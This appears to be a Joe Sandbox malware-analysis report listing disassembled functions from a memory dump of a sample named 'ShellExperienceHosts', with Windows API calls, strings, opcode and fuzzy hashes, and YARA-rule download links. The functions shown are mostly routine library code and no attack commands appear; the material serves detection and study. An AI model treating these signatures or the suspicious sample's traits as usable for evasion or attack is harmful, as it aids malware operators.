Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: ad9837b0a9a4fb84ac37de65f9c6e342a6be5dd4c9168cd23a291ae327f5b0bf
Instruction ID: cf7fef6bd17e3f31701b6f44f3b47ab9165ad0252659751a9cf2e574a8199263
Opcode Fuzzy Hash: ad9837b0a9a4fb84ac37de65f9c6e342a6be5dd4c9168cd23a291ae327f5b0bf
Instruction Fuzzy Hash: 2611EB72500B446BC700CF99D806BE6B39CAF19314F148516F968DBE40F734E955CBD1

Function 6C9D19B3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9BE140: LoadLibraryW.KERNEL32(00000000,6CB73848,00000010,6C9B8A45,?,?,?,00000000), ref: 6C9BE181

GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 6C9D19F2
FreeLibrary.KERNEL32(00000000,?,?,00001000,?,?,?), ref: 6C9D1A3E

Part of subcall function 6C9D199C: GetLastError.KERNEL32(00000000,00000000,00000800), ref: 6C9D199C

Strings

comctl32.dll, xrefs: 6C9D19CB
DllGetVersion, xrefs: 6C9D19EC

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Library$AddressErrorFreeLastLoadProc
String ID: DllGetVersion$comctl32.dll
API String ID: 2540614322-3857068685
Opcode ID: d34ace3eb2d816ef0738bc006aefe73a84f4c33b017d58b0b58fd30bd1cab47c
Instruction ID: bdefb758ecc145c56081ff2fcaf1f7e8e6b450c8f7929743a755310ce97c2fea
Opcode Fuzzy Hash: d34ace3eb2d816ef0738bc006aefe73a84f4c33b017d58b0b58fd30bd1cab47c
Instruction Fuzzy Hash: C511E376A016099BCB01DFE9D845BDEB7F8AF86324F114069E915FB340DB30E905CBA1

Function 6C9DC3B5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 6C9DC3E0
IsAppThemed.UXTHEME ref: 6C9DC43A
OpenThemeData.UXTHEME(?,REBAR), ref: 6C9DC44C

Strings

REBAR, xrefs: 6C9DC444

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: DataOpenParentThemeThemed
String ID: REBAR
API String ID: 2040651904-925029515
Opcode ID: cbf44e072c5835c0afd5352ed1a2ce537ff2957b581b642a08a98a0e3c344b1f
Instruction ID: d0905c2f474a8c818f8168a5a8ce4029e22d592dd20bf2c5c515c0fb7f348e6d
Opcode Fuzzy Hash: cbf44e072c5835c0afd5352ed1a2ce537ff2957b581b642a08a98a0e3c344b1f
Instruction Fuzzy Hash: B301C431304B816BDB446B349C587AE7769BFB531AF128A29D81AE7B80DF30E405C661

Function 6C9B7D46 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9D4C03: EnterCriticalSection.KERNEL32(6CB8DB80,?,?,?,?,6C9D2337,00000010,00000008,6C9D0D22,6C9D0D65,6C9B9048,6C9C66EE,?,6C9CC267,00000004,6C9CCA19), ref: 6C9D4C34
Part of subcall function 6C9D4C03: InitializeCriticalSection.KERNEL32(00000000,?,?,?,?,6C9D2337,00000010,00000008,6C9D0D22,6C9D0D65,6C9B9048,6C9C66EE,?,6C9CC267,00000004,6C9CCA19), ref: 6C9D4C4A
Part of subcall function 6C9D4C03: LeaveCriticalSection.KERNEL32(6CB8DB80,?,?,?,?,6C9D2337,00000010,00000008,6C9D0D22,6C9D0D65,6C9B9048,6C9C66EE,?,6C9CC267,00000004,6C9CCA19), ref: 6C9D4C58
Part of subcall function 6C9D4C03: EnterCriticalSection.KERNEL32(00000000,?,?,?,6C9D2337,00000010,00000008,6C9D0D22,6C9D0D65,6C9B9048,6C9C66EE,?,6C9CC267,00000004,6C9CCA19,00000120), ref: 6C9D4C65

Part of subcall function 6C9D231D: __EH_prolog3_catch.LIBCMT ref: 6C9D2324

Part of subcall function 6C9B897D: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6C9B89A3
Part of subcall function 6C9B897D: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6C9B89B3
Part of subcall function 6C9B897D: EncodePointer.KERNEL32(00000000,?,00000000), ref: 6C9B89BC

GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 6C9B7D88
FreeLibrary.KERNEL32(?,?,6C9B9048), ref: 6C9B7D98

Strings

hhctrl.ocx, xrefs: 6C9B7D6C
HtmlHelpW, xrefs: 6C9B7D82

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CriticalSection$AddressEnterProc$EncodeFreeH_prolog3_catchHandleInitializeLeaveLibraryModulePointer
String ID: HtmlHelpW$hhctrl.ocx
API String ID: 849444252-3773518134
Opcode ID: 2f5acb59b2ed41cf46103f6c7cbb29396e4041671afa9c57dd10bae49b14f3f9
Instruction ID: 758432aa9b706c191b3a09a6d0348350eb9c5e3feb0be6a300c00acbb86724b0
Opcode Fuzzy Hash: 2f5acb59b2ed41cf46103f6c7cbb29396e4041671afa9c57dd10bae49b14f3f9
Instruction Fuzzy Hash: 6001A235600B1ABBCF215F75D804B9B7BF8EF517A8F008929E55AB7E50CB31E4109A61

Function 6C9CE15B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,0002001F,?,?,6C9CDD45,?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6C9CE16C
GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 6C9CE17C

Strings

Advapi32.dll, xrefs: 6C9CE167
RegCreateKeyTransactedW, xrefs: 6C9CE176

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegCreateKeyTransactedW
API String ID: 1646373207-2994018265
Opcode ID: 0813badface9aa80d224db9bfa11b93df99a949542d35439fff68b125a830822
Instruction ID: c7d32767068e7cb01b9045d283d41251db0fbe691f332a811a4db385c858aa23
Opcode Fuzzy Hash: 0813badface9aa80d224db9bfa11b93df99a949542d35439fff68b125a830822
Instruction Fuzzy Hash: 76016936300548ABCF125E94EC05FAA3BBAFF89365F104425FA1992860C772C970EB92

Function 6C9CEDB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,00000000,00000010,?,?,6C9CECC3,?,00000010), ref: 6C9CEDCC
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 6C9CEDDC

Strings

Advapi32.dll, xrefs: 6C9CEDC7
RegDeleteKeyTransactedW, xrefs: 6C9CEDD6

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegDeleteKeyTransactedW
API String ID: 1646373207-2168864297
Opcode ID: fe5427bae6a615eec96dc14b41f0f6a50c02c9e371bf81301a419ed024afc174
Instruction ID: 59a1f2ac64f429303a377ad073ab4a1fce30af7767863382354ea32a6bc738fb
Opcode Fuzzy Hash: fe5427bae6a615eec96dc14b41f0f6a50c02c9e371bf81301a419ed024afc174
Instruction Fuzzy Hash: 06F0903730154DAFAF111E94AC4882B77ADFA852A9710043AF15A83810CA32CC009AA2

Function 6C9D1B2C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 6C9D1B47
GetClassNameW.USER32(?,?,0000000A), ref: 6C9D1B5C
CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,combobox,000000FF), ref: 6C9D1B73

Strings

combobox, xrefs: 6C9D1B64

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ClassCompareLongNameStringWindow
String ID: combobox
API String ID: 1414938635-2240613097
Opcode ID: e3146449231382f8975009e7dab12fcf0b0264539e91e525e45a94ca04a142c0
Instruction ID: 6d992731899fc54954a8344bfa56346b9a6f8800d3c098c27380a9ab7d959a36
Opcode Fuzzy Hash: e3146449231382f8975009e7dab12fcf0b0264539e91e525e45a94ca04a142c0
Instruction Fuzzy Hash: 91F0FF32755218ABCB00EF68CC06EAE77B8EB07B30F500315B421EB1C0DA30E6018790

Function 6C9CE1CB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,0002001F,?,?,6C9CDCED,80000001,software,00000000,0002001F,?), ref: 6C9CE1DC
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 6C9CE1EC

Strings

Advapi32.dll, xrefs: 6C9CE1D7
RegOpenKeyTransactedW, xrefs: 6C9CE1E6

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegOpenKeyTransactedW
API String ID: 1646373207-3913318428
Opcode ID: 2c8b75bf7bf4d520ab50558e8d87f9946010b70568a0b6f4bf7047b7b4f19b62
Instruction ID: 368d5efd490bcec104d9fc3d5ac411f1132d9e0a2139298970ece0ef4daa1492
Opcode Fuzzy Hash: 2c8b75bf7bf4d520ab50558e8d87f9946010b70568a0b6f4bf7047b7b4f19b62
Instruction Fuzzy Hash: 45F062363002C8ABDF211E54FC05FAA3BBDFF89265F100435F55A82952D772D450DB92

Function 6C9FE3AF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 6C9FE3D9
GetFileAttributesW.KERNEL32(000000FF,00000104,00000104,000000FF,?,?), ref: 6C9FE3E4
GetTempFileNameW.KERNEL32(?,?,00000000,000000FF,?,?,6CA081BE,00000000,AFX,00000000,00000104,00000104,000000FF,?,?), ref: 6C9FE3FC

Strings

%s%s%X.tmp, xrefs: 6C9FE3CE

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: File$AttributesNameTempswprintf
String ID: %s%s%X.tmp
API String ID: 2659213859-596088238
Opcode ID: 40038ff80637b6d788ee83b63ddb5643d5ff638bc52251b1a49aa61fb8d09503
Instruction ID: 9f4bf940ff05f8d1e2217aa5f080c0a0435cd83f00e9b581d7d488d1a69497d7
Opcode Fuzzy Hash: 40038ff80637b6d788ee83b63ddb5643d5ff638bc52251b1a49aa61fb8d09503
Instruction Fuzzy Hash: 58F08C3650024AFBCF019F90DC05ACE3F7AFF04368F104600FA25A59A1D772CA20AB90

Function 6CAFAD22 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6CAFACD3,00000001,?,00000001,?,?,?,6CAFADC2,00000001,FlsFree,6CB5FF9C,FlsFree), ref: 6CAFAD2F
GetLastError.KERNEL32(?,6CAFACD3,00000001,?,00000001,?,?,?,6CAFADC2,00000001,FlsFree,6CB5FF9C,FlsFree,00000001,?,6CAF9CDF), ref: 6CAFAD39
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6CAFAD61

Strings

api-ms-, xrefs: 6CAFAD46

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 72623ffa07af7990f63448f8c15ad1dca6d67c5ebfcc4f8e8623e002e7dee1ba
Instruction ID: e784fbb9bf4e3ce00b102c7bb0b024630d2dd8093dc9bc7cff1d1d7f7cf27349
Opcode Fuzzy Hash: 72623ffa07af7990f63448f8c15ad1dca6d67c5ebfcc4f8e8623e002e7dee1ba
Instruction Fuzzy Hash: 9AE04F38785244BBEF201E61EC05B9D7F759F01B5AF284020F94CEA9D0D772E99295A4

Function 6C9F7EDF Relevance: 6.3, APIs: 4, Instructions: 339keyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9BE4A3: GetWindowLongW.USER32(?,000000EC), ref: 6C9BE4B0

GetAsyncKeyState.USER32(00000011), ref: 6C9F7FE9
GetClientRect.USER32(?,?), ref: 6C9F818B
SetScrollPos.USER32(00000000,00000002,?,00000001), ref: 6C9F8279

Part of subcall function 6C9F54F4: GetClientRect.USER32(?,?), ref: 6C9F552E
Part of subcall function 6C9F54F4: InflateRect.USER32(?,00000000,00000000), ref: 6C9F5568
Part of subcall function 6C9F54F4: SetRectEmpty.USER32(?), ref: 6C9F560C
Part of subcall function 6C9F54F4: SetRectEmpty.USER32(?), ref: 6C9F5619
Part of subcall function 6C9F54F4: GetSystemMetrics.USER32(00000002), ref: 6C9F563E
Part of subcall function 6C9F54F4: EqualRect.USER32(?,?), ref: 6C9F570B

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$ClientEmpty$AsyncEqualInflateLongMetricsScrollStateSystemWindow
String ID:
API String ID: 3234605627-0
Opcode ID: 1865b08e8ae8069c3cbf2a88d44b33641c04736aad289862b5c1315f2c60a280
Instruction ID: bee4f4cb70df0ffc9d3574771ba6adeac3ac002e267766397af4f1f356ca6cf6
Opcode Fuzzy Hash: 1865b08e8ae8069c3cbf2a88d44b33641c04736aad289862b5c1315f2c60a280
Instruction Fuzzy Hash: 79C10334B01655CBDF598F69C898BBD37B5BF46308F14016AD8269BB85CB70E807CB84

Function 6CB128CA Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(3E6EA3C2,00000000,00000000,?), ref: 6CB1292D

Part of subcall function 6CB0EDC2: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CB14BD4,?,00000000,-00000008), ref: 6CB0EE23

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6CB12B7F
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CB12BC5
GetLastError.KERNEL32 ref: 6CB12C68

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 5c36abe0637fbea823b89e76b4d82eeabee2ef3dfb854c6b2dccd4ac8fefc0b1
Instruction ID: f70c830102166623da08253ebdc2b061a4120e81110215ecaff58673023b6b0e
Opcode Fuzzy Hash: 5c36abe0637fbea823b89e76b4d82eeabee2ef3dfb854c6b2dccd4ac8fefc0b1
Instruction Fuzzy Hash: 63D18C75E052889FCF01CFA8C884ADEBBB4EF0A314F24412AE565EBB51D730A946CB51

Function 6C9DBCEA Relevance: 6.2, APIs: 4, Instructions: 228COMMON

Download Yara Rule

APIs

IsThemeBackgroundPartiallyTransparent.UXTHEME(?,00000006,00000000,6CB33490), ref: 6C9DBDD8
DrawThemeParentBackground.UXTHEME(?,?,00000000), ref: 6C9DBDF2
DrawThemeBackground.UXTHEME(?,?,00000006,00000000,00000000,00000000), ref: 6C9DBE0E
GetBkColor.GDI32(?), ref: 6C9DBE20

Part of subcall function 6C9D83BB: SetBkColor.GDI32(?,?), ref: 6C9D83D4
Part of subcall function 6C9D83BB: ExtTextOutW.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 6C9D8406

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: BackgroundTheme$ColorDraw$ParentPartiallyTextTransparent
String ID:
API String ID: 501873518-0
Opcode ID: dd7b3ab74128c1f12bf4099a673e531d9e3c070cc03289f406700e5b5c3b3a5d
Instruction ID: 1de3a5008fb9418a08e4d64267721b6a0d8a86cd38e2431cb99179dfdba5dfad
Opcode Fuzzy Hash: dd7b3ab74128c1f12bf4099a673e531d9e3c070cc03289f406700e5b5c3b3a5d
Instruction Fuzzy Hash: 32914C71E01619AFDF11CF99C884BEEBBB9EF49714F118155E918BB690C771A840CFA0

Function 6C9FA40B Relevance: 6.2, APIs: 4, Instructions: 195COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 6C9FA45F
InflateRect.USER32(?,00000000,00000000), ref: 6C9FA495
GetSystemMetrics.USER32(00000002), ref: 6C9FA51C

Part of subcall function 6C9BC1D2: SetScrollInfo.USER32(?,?,?,?), ref: 6C9BC216

EnableScrollBar.USER32(?,00000002,00000003), ref: 6C9FA63B

Part of subcall function 6C9BE3BF: EnableWindow.USER32(?,00000064), ref: 6C9BE3D0

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: EnableRectScroll$ClientInflateInfoMetricsSystemWindow
String ID:
API String ID: 3090651611-0
Opcode ID: c6db9670b668e85298e1e5d3bb688ea0061ae59fc204277a37c65d54c4716d9a
Instruction ID: 297cb33e0140e7fbf462be3cc44e2fa05bddff4a1e6b9d7ccc9cea6373a990a3
Opcode Fuzzy Hash: c6db9670b668e85298e1e5d3bb688ea0061ae59fc204277a37c65d54c4716d9a
Instruction Fuzzy Hash: AC713831A00619DFCF10CFA8C988AEDB7B9FF48304F14016AE919EB645DB70AD46CB60

Function 6C9C18D8 Relevance: 6.2, APIs: 4, Instructions: 181windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C9C18E2
GetDlgCtrlID.USER32(?), ref: 6C9C1932
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 6C9C19C7
SetMenu.USER32(?,?), ref: 6C9C1AD3

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CtrlH_prolog3_MenuWindow
String ID:
API String ID: 739472796-0
